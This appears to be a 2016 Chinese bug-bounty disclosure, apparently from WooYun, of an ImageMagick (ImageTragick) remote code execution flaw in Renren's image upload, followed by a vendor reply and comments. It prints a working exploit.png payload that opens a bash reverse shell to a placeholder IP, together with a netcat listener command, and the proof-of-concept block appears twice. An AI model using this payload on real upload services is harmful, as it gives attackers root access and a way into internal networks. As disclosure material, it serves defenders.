人人网某漏洞导致直接Getshell影响主干网络直入内网

ImageMagick 漏洞，远程代码执行，直接获取root shell 权限

ImageMagic 漏洞， 漏洞详情见https://www.helpnetsecurity.com/2016/05/04/imagemagick-zero-day-flaw/

构造POC exploit.png

push graphic-context

viewbox 0 0 640 480

fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/xx.xx.xx.xx/8080 0>&1 &")'

pop graphic-context

个人vps 上开启8080 端口监听

nc -l 8080

在人人网上传图片处上传exploit.png 图片，会提示图片上传失败，但是反弹shell 成功，见

直接拿到root shell

ImageMagic 漏洞， 漏洞详情见https://www.helpnetsecurity.com/2016/05/04/imagemagick-zero-day-flaw/

构造POC exploit.png

push graphic-context

viewbox 0 0 640 480

fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/xx.xx.xx.xx/8080 0>&1 &")'

pop graphic-context

个人vps 上开启8080 端口监听

nc -l 8080

在人人网上传图片处上传exploit.png 图片，会提示图片上传失败，但是反弹shell 成功，见

直接拿到root shell

修复方案见 https://imagetragick.com/

厂商回应：

危害等级：中

漏洞Rank：9

确认时间：2016-05-06 21:22

厂商回复：

感谢

最新状态：

暂无

1. 2016-05-05 10:55 | 浩天 ( 普通白帽子 | Rank:925 漏洞数:80 | 哈！躁起来！)

   0

   开始我没信，现在我信了

   1# 回复此人

2. 2016-05-05 10:56 | 白开水 ( 普通白帽子 | Rank:273 漏洞数:34 | 苍茫的天涯是我的爱~)

   0

   沙发

   2# 回复此人

3. 2016-05-05 11:02 | Hex ( 实习白帽子 | Rank:33 漏洞数:14 | 安全圈小学生)

   0

   666

   3# 回复此人

4. 2016-05-05 11:07 | 金枪银矛小霸王 ( 普通白帽子 | Rank:141 漏洞数:30 | 不会挖洞洞的猿猿不是好学生)

   0

   开始我没信，现在我信了

   4# 回复此人

5. 2016-05-05 11:09 | 隔壁小王 ( 普通白帽子 | Rank:111 漏洞数:30 )

   0

   开始我没信，现在我信了

   5# 回复此人

6. 2016-05-05 11:14 | 无名 ( 实习白帽子 | Rank:41 漏洞数:9 | 我是一只小菜鸟呀，伊雅伊尔哟。)

   0

   我信了

   6# 回复此人

7. 2016-05-05 11:20 | Brother ( 实习白帽子 | Rank:78 漏洞数:24 )

   0

   开始我没信，现在我信了，咱也要观摩

   7# 回复此人

8. 2016-05-05 11:23 | 0h1in9e ( 实习白帽子 | Rank:68 漏洞数:23 | 林歌 | 峨眉山下修炼中的<网络安全></web开...)

   0

   6666666666666666

   8# 回复此人

9. 2016-05-05 11:29 | scanf ( 核心白帽子 | Rank:1694 漏洞数:239 | 。)

   1

   我日

   9# 回复此人

10. 2016-05-05 11:33 | 机器猫 ( 普通白帽子 | Rank:1358 漏洞数:291 | 爱生活、爱腾讯、爱网络！一个有梦想的16岁...)

    1

    命令执行

    10# 回复此人

11. 2016-05-05 11:37 | 机器猫 ( 普通白帽子 | Rank:1358 漏洞数:291 | 爱生活、爱腾讯、爱网络！一个有梦想的16岁...)

    0

    @scanf 欧巴，我很好奇那个微博查询手机号和邮箱你怎么弄的，实在想不出来

    11# 回复此人

12. 2016-05-05 11:47 | automne ( 实习白帽子 | Rank:50 漏洞数:16 | 请多指教)

    0

    仰望大神操作

    12# 回复此人

13. 2016-05-05 11:53 | 金枪银矛小霸王 ( 普通白帽子 | Rank:141 漏洞数:30 | 不会挖洞洞的猿猿不是好学生)

    0

    @机器猫 你猜

    13# 回复此人

14. 2016-05-05 11:53 | 火焰真菌 ( 实习白帽子 | Rank:51 漏洞数:17 | 123)

    0

    Wget -O xx.jsp

    14# 回复此人

15. 2016-05-05 11:58 | 巫妖王 ( 路人 | Rank:0 漏洞数:1 | 这个家伙很懒,居然什么都不写!)

    0

    围观啊,不明觉厉

    15# 回复此人

16. 2016-05-05 12:01 | scanf ( 核心白帽子 | Rank:1694 漏洞数:239 | 。)

    0

    @机器猫 内网某平台而已

    16# 回复此人

17. 2016-05-05 12:11 | her0ma ( 普通白帽子 | Rank:716 漏洞数:101 | 专注小厂商三十年！)

    1

    人人网修复速度有点慢啊~

    17# 回复此人

18. 2016-05-05 12:27 | U神 ( 核心白帽子 | Rank:1375 漏洞数:153 | 乌云核心菜鸟，此号长期由联盟托管，如果近...)

    2

    还有人玩人人网吗

    18# 回复此人

19. 2016-05-05 12:38 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)

    0

    我是第100名关注人

    19# 回复此人

20. 2016-05-05 12:50 | 坏男孩-A_A ( 实习白帽子 | Rank:81 漏洞数:23 | 膜拜学习中)

    0

    开始我没信，现在我信了，咱也要观摩

    20# 回复此人

21. 2016-05-05 13:06 | phith0n ( 普通白帽子 | Rank:834 漏洞数:127 | 一个想当文人的黑客~)

    0

    imagemagic 命令执行的应用~

    21# 回复此人

22. 2016-05-05 13:44 | Whoamii ( 路人 | Rank:2 漏洞数:1 | 学习渗透方向，希望结识同道中人共同学习，...)

    0

    此洞必火！

    22# 回复此人

23. 2016-05-05 13:51 | xfkxfk ( 核心白帽子 | Rank:2341 漏洞数:353 | 呵呵！)

    0

    imagemagic 命令执行的应用~

    23# 回复此人

24. 2016-05-05 14:22 | 凌晨G度 ( 路人 | Rank:7 漏洞数:2 | 充实的麦穗都是低着头，倒是那些空壳却昂着...)

    0

    不上人人好久了

    24# 回复此人

25. 2016-05-05 14:24 | 凌晨G度 ( 路人 | Rank:7 漏洞数:2 | 充实的麦穗都是低着头，倒是那些空壳却昂着...)

    0

    @浩天 漏洞审核怎么那么慢啊！？

    25# 回复此人

26. 2016-05-05 14:26 | cf_hb ( 普通白帽子 | Rank:119 漏洞数:17 | 爱生活，爱安全！)

    0

    imagemagic 命令执行的应用~

    26# 回复此人

27. 2016-05-05 16:40 | 小小白帽 ( 实习白帽子 | Rank:61 漏洞数:18 | 致力于代码审计和漏洞挖掘)

    0

    imagemagic 都已经用上了

    27# 回复此人

28. 2016-05-05 17:13 | sysALong ( 普通白帽子 | Rank:464 漏洞数:100 | 在我们黑龙江这噶哒，就没有什么事是【撸串...)

    0

    浩天欧巴都说话了，那就得关注 看看了。。。 没办法。

    28# 回复此人

29. 2016-05-05 17:34 | Code Life ( 普通白帽子 | Rank:202 漏洞数:45 | Code Life,Join It!)

    0

    :-O 我信 我信 我信

    29# 回复此人

30. 2016-05-05 19:05 | MAX丶 ( 路人 | Rank:20 漏洞数:5 | 人生路上总有一些不顺心的事情，让我们跳过...)

    0

    我去真迅速。。。

    30# 回复此人

31. 2016-05-05 19:40 | 0h1in9e ( 实习白帽子 | Rank:68 漏洞数:23 | 林歌 | 峨眉山下修炼中的<网络安全></web开...)

    0

    @浩天 麻烦看看哦！还有4个没审，都好几天了

    31# 回复此人

32. 2016-05-05 19:48 | 中国Cold ( 实习白帽子 | Rank:57 漏洞数:24 | 服重任,行远道,正直而固者,轴也。)

    0

    开始我没信，现在我信了

    32# 回复此人

33. 2016-05-05 19:53 | 小牛牛 ( 普通白帽子 | Rank:139 漏洞数:17 | 求带)

    1

    我反正是信了

    33# 回复此人

34. 2016-05-05 20:52 | 红颜小妖 ( 路人 | Rank:6 漏洞数:3 | 忙到停不下来)

    0

    开始我没信，现在我信了

    34# 回复此人

35. 2016-05-05 20:52 | who_jeff ( 路人 | Rank:16 漏洞数:6 | )

    0

    我信了 ，利用成功 ？

    35# 回复此人

36. 2016-05-05 21:01 | who_jeff ( 路人 | Rank:16 漏洞数:6 | )

    0

    应该可以刷一波了，利用起来不难

    36# 回复此人

37. 2016-05-05 21:05 | 明月影 ( 路人 | Rank:12 漏洞数:8 )

    0

    再次杀进内网

    37# 回复此人

38. 2016-05-05 21:19 | Q1NG ( 普通白帽子 | Rank:148 漏洞数:27 | 临 兵 斗 者 皆 阵 列 前 行 !)

    0

    为什么我测试的时候没成功呢？哪个屌大说下

    38# 回复此人

39. 2016-05-05 21:33 | 你大爷在此 百无禁忌 ( 路人 | Rank:18 漏洞数:9 | 迎风尿三丈 顺风八十米)

    0

    我宣布 这个洞火了

    39# 回复此人

40. 2016-05-05 21:47 | 淡蓝色の忧伤 ( 普通白帽子 | Rank:268 漏洞数:38 | 找个实习，有人要吗？(黑产勿扰))

    0

    imagemagic 命令执行的应用~

    40# 回复此人

41. 2016-05-05 23:05 | 鱼化石 ( 实习白帽子 | Rank:93 漏洞数:18 | 介绍不能为空)

    0

    为表感谢，我们也申请了一台iPhone6S,请联系我们领取。

    41# 回复此人

42. 2016-05-05 23:46 | storysky ( 路人 | Rank:10 漏洞数:4 | 自由的风)

    0

    等待公布

    42# 回复此人

43. 2016-05-07 12:17 | starry ( 路人 | Rank:4 漏洞数:1 | coder)

    0

    为表感谢，我们申请了苹果6斤,请联系我们领取。

    43# 回复此人

44. 2016-05-07 20:17 | 王十三 ( 路人 | Rank:6 漏洞数:2 )

    0

    小菜膜拜下

    44# 回复此人

45. 2016-05-26 21:36 | 幻老头儿 ( 普通白帽子 | Rank:285 漏洞数:63 | 新手上路。)

    0

    拿到源码了么？

    45# 回复此人

46. 2016-06-21 09:55 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)

    0

    看你的标题，应该不止这些内容才对啊！！割掉了？

    46# 回复此人

47. 2016-06-21 10:11 | 美食家L ( 实习白帽子 | Rank:65 漏洞数:10 | http://404.so 安静的坚持自己的原则)

    0

    瞎掉了

    47# 回复此人

48. 2016-06-21 13:22 | 尊-折戟 ( 普通白帽子 | Rank:106 漏洞数:23 | 当我入梦，这个世界就将颤抖！)

    0

    imagemagic漏洞的应用

    48# 回复此人